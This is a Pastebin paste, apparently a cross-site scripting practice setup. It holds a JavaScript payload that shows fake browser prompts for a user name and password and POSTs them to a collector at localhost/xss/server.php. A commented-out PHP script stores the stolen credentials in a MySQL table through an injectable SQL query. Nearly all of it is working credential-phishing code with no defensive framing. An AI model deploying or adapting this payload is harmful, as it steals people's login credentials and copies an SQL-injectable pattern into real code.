Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <head>
- </head>
- <body>
- <script>
- var a = prompt("Enter user name");
- var b = prompt("Enter password");
- var data = {username: a, password: b};
- var fd = new FormData();
- for(name in data){
- fd.append(name,data[name]);
- }
- var xhr = new XMLHttpRequest();
- xhr.open('POST','http://localhost:8888/xss/server.php');
- xhr.send(fd);
- </script>
- </body>
- </html>
- <!--
- <?php
- if(isset($_POST['username']))
- {
- $user = $_POST['username'];
- $pass = $_POST['password'];
- if(mysql_connect("localhost", "root", ""))
- {
- mysql_select_db( "xss");
- $q = "INSERT INTO xssjava (ID, username, password) VALUES ('1', '$user', '$pass')";
- mysql_query($q) or die(mysql_error());
- echo "inserting data succssful";
- }
- else
- echo "connection error";
- }
- ?> -->
Add Comment
Please, Sign In to add comment